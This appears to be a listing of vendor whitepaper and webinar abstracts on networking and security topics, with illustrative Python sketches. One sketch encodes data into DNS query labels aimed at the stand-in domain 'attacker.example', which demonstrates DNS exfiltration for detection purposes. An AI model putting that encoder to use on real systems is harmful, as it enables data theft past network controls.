Published By: Gigamon
Published Date: Oct 15, 2015
NetFlow was introduced on Cisco routers as a way to monitor packets as they enter and exit networking device interfaces in order to gain insight into traffic and resolve congestion. A typical NetFlow record reveals the traffic source and destination as well as the protocol or application, time stamps, and number of packets. Although NetFlow was initially not on a standards track, it has since been superseded by Internet Protocol Flow Information eXport (IPFIX), which is based on the NetFlow Version 9 implementation and is on the IETF standards track with RFCs 5101 and 5102.
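The flow-record fields described above can be sketched as a simple structure. This is only an illustration of what such a record carries; the field names are assumptions, not the wire encoding defined by the IPFIX RFCs:

```python
from dataclasses import dataclass

@dataclass
class FlowRecord:
    """Illustrative NetFlow/IPFIX-style flow record (field names assumed)."""
    src_addr: str
    dst_addr: str
    protocol: int      # IP protocol number, e.g. 6 = TCP
    src_port: int
    dst_port: int
    first_seen: float  # flow start timestamp (epoch seconds)
    last_seen: float   # flow end timestamp
    packets: int       # number of packets observed in the flow
    octets: int        # total bytes observed in the flow

# One hypothetical flow: a short HTTPS exchange
record = FlowRecord("10.0.0.5", "192.0.2.10", 6, 51514, 443,
                    1444867200.0, 1444867205.3, 42, 61337)
```

A collector aggregates many such records to answer the "who talked to whom, over what, and how much" questions the passage describes.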
Everyone is concerned with digital data security today, in one way or another. For every digital advancement, there seems to be a counter development to breach its security. The trust and etiquette that once governed the use of the old telephone party lines would serve us well today, but we cannot count on such protocol for today’s data and communication devices. Additional protection is needed.
The Digital Security and Surveillance eZine is about channel partners extending their expertise in Internet Protocol to a whole new arena. For these partners, security goes well beyond software, firewalls, VPNs and other security offerings commonly discussed in the industry. These partners are combining networks, storage, cameras and similar technologies into full solutions designed to help protect the customer.
Are common myths about switching your business phone service to hosted Voice over Internet Protocol (VoIP) holding back your business? As voice, video, and data networks meld into a single user experience, solutions that integrate phone service, unified messaging, voicemail, audio and video capabilities, rich-media conferencing, and mobility solutions are in high demand.
Firewalls enforce network access via a positive control model, where only specific traffic defined in policies is granted access to the network while all other traffic is denied. Access Control Lists (ACLs) initially performed this functionality, often in routers, but their rudimentary approach gave way to dedicated packet filtering and stateful inspection firewall devices that offered deeper levels of access controls. Unfortunately, these traditional firewalls shared a common shortcoming—an inability to see all of the applications traversing the network across all ports and protocols. The use of proxy-based devices began providing more granular visibility into a small set of applications and protocols where traditional firewalls were blind.
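The positive control model described above can be sketched as a default-deny rule match: only traffic matching an explicit policy entry is allowed, and everything else is dropped. The rule fields and values below are illustrative assumptions:

```python
# Explicit allow rules; anything not matched falls through to deny.
ALLOW_RULES = [
    {"proto": "tcp", "dst_port": 443},  # permit HTTPS
    {"proto": "udp", "dst_port": 53},   # permit DNS
]

def permitted(packet: dict) -> bool:
    """Return True only if the packet matches an explicit allow rule."""
    for rule in ALLOW_RULES:
        if all(packet.get(k) == v for k, v in rule.items()):
            return True
    return False  # implicit deny: no matching rule means drop

assert permitted({"proto": "tcp", "dst_port": 443})
assert not permitted({"proto": "tcp", "dst_port": 23})  # telnet denied
```

Note that matching on protocol and port alone is exactly the blindness the passage describes: any application tunneled over port 443 would match the HTTPS rule regardless of what it actually is, which is the gap proxy-based and application-aware devices were built to close.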
Published By: Tripp Lite
Published Date: May 15, 2018
A Practical Guide to IDF/MDF Infrastructure Implementation
Once relegated to early adopters and casual home users, VoIP (voice over Internet protocol) has matured. An essential element of any unified communications (UC) system, it is now the standard method of voice communication in business, education, government and healthcare. If your organization has not already migrated to VoIP, the question is not so much if it will, but when. Cost is the primary driver, since the data network performs double duty by carrying voice traffic as well. VoIP also offers capabilities that far exceed traditional phone systems, with unified communication platforms promising to integrate messaging, mobility, collaboration, relationship management, zoned security, intelligent call routing, disaster recovery, video, teleconferencing, status updates and other advanced features.
The transition to VoIP presents a number of challenges, including assessing the ability of your network to handle not only additio
Frost & Sullivan review the limitations associated with a single-provider approach to MPLS networks and its impact on the enterprise. They examine Virtela's Global Service Fabric - a multi-carrier network approach that provides a best-of-breed global MPLS network solution.
Today’s data centers are expected to deploy, manage, and report on different tiers of business applications, databases, virtual workloads, home directories, and file sharing simultaneously. They also need to co-locate multiple systems while sharing power and energy. This is true for large as well as small environments. The trend in modern IT is to consolidate as much as possible to minimize cost and maximize efficiency of data centers and branch offices. HPE 3PAR StoreServ is highly efficient, flash-optimized storage engineered for the true convergence of block, file, and object access to help consolidate diverse workloads efficiently. HPE 3PAR OS and converged controllers incorporate multiprotocol support into the heart of the system architecture.
Published By: Preempt
Published Date: Nov 02, 2018
Attackers and malware are increasingly relying on a common set of tools to compromise identities and spread within a network. Tools like Mimikatz, accompanied by common administrator tools like PsExec and WMI, have become a standard part of an attacker’s arsenal for turning a single machine compromise into a full network breach. This webinar looks at why some of these tools are traditionally difficult to control and introduces new countermeasures that let you fight back. Topics covered:
- An analysis of recent malware and attacks and the tools they used to spread through the network.
- A closer look at the underlying protocols supporting these tools, and the traditional challenges to controlling them.
- New controls that allow organizations to control NTLM in real time, block pass-the-hash techniques, and adaptively restrict the use of NTLM in the network.
- How to gain visibility into PsExec, WMI, and RPC in general and how to create controls t
DNS is a well-worn data exfiltration and communication vector. Explore why targeted threats continue to use the DNS protocol to exfiltrate sensitive information, how it’s done, and what might be next in the evolution of this attack vector.
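As a rough illustration of the technique, the sketch below shows how exfiltrated bytes can be encoded into DNS-safe labels and disguised as ordinary lookups against an attacker-controlled zone. The domain name and encoding choices are assumptions for illustration only:

```python
import base64

def exfil_queries(data: bytes, domain: str = "attacker.example") -> list[str]:
    """Encode data into hostname labels, one DNS query per chunk."""
    # Base32 keeps the payload within the DNS hostname character set.
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    # Individual DNS labels are limited to 63 characters.
    labels = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
    return [f"{label}.{domain}" for label in labels]

queries = exfil_queries(b"secret-password")
# To resolvers along the path, each query looks like an ordinary lookup,
# while the attacker's authoritative server decodes the labels.
```

Spotting this pattern (long, high-entropy labels and unusual query volume to a single zone) is exactly what DNS-layer threat detection looks for.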
Published By: Teradata
Published Date: Jun 22, 2015
Passed on May 9, 2014, the Digital Accountability and Transparency Act (DATA Act) requires federal agencies to report all expenditures—grants, loans, and contracts—in order to give American citizens and policy makers better visibility into federal spending. At first glance, the new federal requirements—scheduled to go into effect in May 2017—can seem like imposed obligations with unknown benefits to the implementers. However, wise agencies and early adopters recognize how to transform this new compliance obligation into an opportunity to advance their federal agency by becoming more data driven. The Federal Government maintains vast amounts of data, and the DATA Act establishes data standards and sharing protocols that will help agencies exploit the benefits of data mining and analytics.
Published By: DigiCert
Published Date: Aug 01, 2018
As a leading provider of SSL certificates, DigiCert is here to help you discover the benefits of using HTTPS across your entire site, and to help you successfully implement it.
HTTPS Everywhere is a best-practice security measure for websites that ensures the entire user experience is safe from online threats. The term simply refers to using HTTPS—the secure web protocol enabled by SSL/TLS—across your entire website rather than only on selected pages.
Implementing HTTPS Everywhere secures the user’s and your organization’s data on every page, from start to finish.
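A minimal sketch of the rewrite rule behind HTTPS Everywhere, assuming a hypothetical helper that upgrades any http:// URL; real deployments typically enforce this with a server-level 301 redirect plus HSTS rather than application code:

```python
from urllib.parse import urlsplit, urlunsplit

def force_https(url: str) -> str:
    """Upgrade an http:// URL to https://, leaving https URLs untouched."""
    parts = urlsplit(url)
    if parts.scheme == "http":
        parts = parts._replace(scheme="https")
    return urlunsplit(parts)

assert force_https("http://example.com/cart") == "https://example.com/cart"
assert force_https("https://example.com/") == "https://example.com/"
```

Applying the rule site-wide, not just on login or checkout pages, is the whole point of the "Everywhere" in the name.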
Published By: Riverbed
Published Date: Jul 17, 2013
Riverbed Cascade is a new type of tool that incorporates traffic monitoring, packet capture and protocol analysis to provide an application-aware view of the network. Download this white paper from NetMedia to learn how Riverbed Cascade can help to solve your IT performance challenges.
Given the wide range of technology options available, it's important for healthcare IT executives to pick the right image management technology and approach for a long-term sustainable solution delivering the desired performance and ROI. This whitepaper explores solutions for multi-layered neutrality, a standards-based framework for unifying medical images and clinical documents across the enterprise and community.
This whitepaper discusses why speed, or throughput, is so critical for today’s Internet users, provides a historical perspective on the Internet’s TCP protocol underpinning and describes how the FastTCP protocol addresses the needs of today’s Internet.
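One way to see why the underlying TCP protocol constrains throughput is the well-known Mathis approximation, which bounds steady-state TCP throughput by segment size, round-trip time, and loss rate. The sample values below are illustrative assumptions:

```python
import math

def mathis_throughput(mss_bytes: int, rtt_s: float, loss: float) -> float:
    """Approximate steady-state TCP throughput in bits per second
    using the Mathis et al. relation: rate ~ MSS / (RTT * sqrt(loss))."""
    return (mss_bytes * 8) / (rtt_s * math.sqrt(loss))

# 1460-byte segments, 100 ms RTT, 0.1% loss: roughly 3.7 Mbit/s,
# no matter how fast the physical link is.
rate = mathis_throughput(1460, 0.100, 0.001)
```

The takeaway matches the whitepaper's premise: on long, slightly lossy paths, classic TCP congestion control, not raw bandwidth, becomes the bottleneck, which is the problem alternative protocols like FastTCP aim to address.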
This competitive review of Red Hat and TIBCO integration technologies presents multiple differences between the products.
A notable difference is that only Red Hat JBoss Fuse is a 100% open source product. Red Hat is committed to leveraging existing open source projects and using open standards whenever possible for both product implementation and integration communication. This includes Apache Camel, the de facto integration standard included with Red Hat JBoss Fuse. Red Hat’s open source commitment extends to ActiveMQ, the upstream messaging technology used with JBoss A-MQ and included with Red Hat JBoss Fuse.
Another difference is that Red Hat JBoss Fuse clustering is based on the upstream Fabric8 community project and offers much more functionality than TIBCO clustering options.
The explosive growth of eCommerce has focused attention on security concerns associated with online payment transactions. Cardholders worry about the safety of online transactions while card issuers are concerned about balancing the risks and costs of payment fraud with a loss of revenue caused by transaction abandonment. The 3-D Secure protocol allows payment card issuers to reduce fraud in payment transactions by verifying cardholder identity during Card Not Present (CNP) transactions. Before a transaction is authorized, a cardholder can be challenged to enter a password, answer a question, or use some other form of authentication credential. This interruption in the transaction often causes legitimate customers to abandon the purchase resulting in loss of revenue for the issuer. The challenge is how to reduce fraud without impacting the user purchase experience.
The tremendous growth of unstructured data is creating huge opportunities for organizations. But it is also creating significant challenges for the storage infrastructure. Many application environments that have the potential to maximize unstructured data have been restricted by the limitations of legacy storage systems. For the past several years—at least—users have expressed a need for storage solutions that can deliver extreme performance along with simple manageability, density, high availability and cost efficiency.
Published By: Workday
Published Date: Jul 19, 2017
The shift to SaaS is gaining momentum and there are clear business benefits that can be derived. To optimise success, transformation strategies need to encompass all elements of people, processes, technology and organisational design. Adopting SaaS technologies drives significant change to the way organisations operate – from business processes to support model design and company culture. The implications of cloud adoption and technical challenges such as integrations, data migration and configuration must be fully understood and addressed from the outset.
The DNS is an often-overlooked protocol. Historically, many companies believed they could either run their own DNS service in-house or simply use a bundled option provided by their hosting or CDN provider. However, with the rise in DDoS attacks and continued migration to the cloud, the mission-critical nature of the DNS has become quite apparent to companies around the world. As a result, many are searching for a managed DNS provider.
DNS speed and reliability are fundamental to the performance of your website and essential to your business. Contact Dyn today to learn how a supplemental DNS service can help you optimize DNS performance and improve user experiences. We can help you determine which multi-DNS option is best for your business and assist with planning and service integration efforts.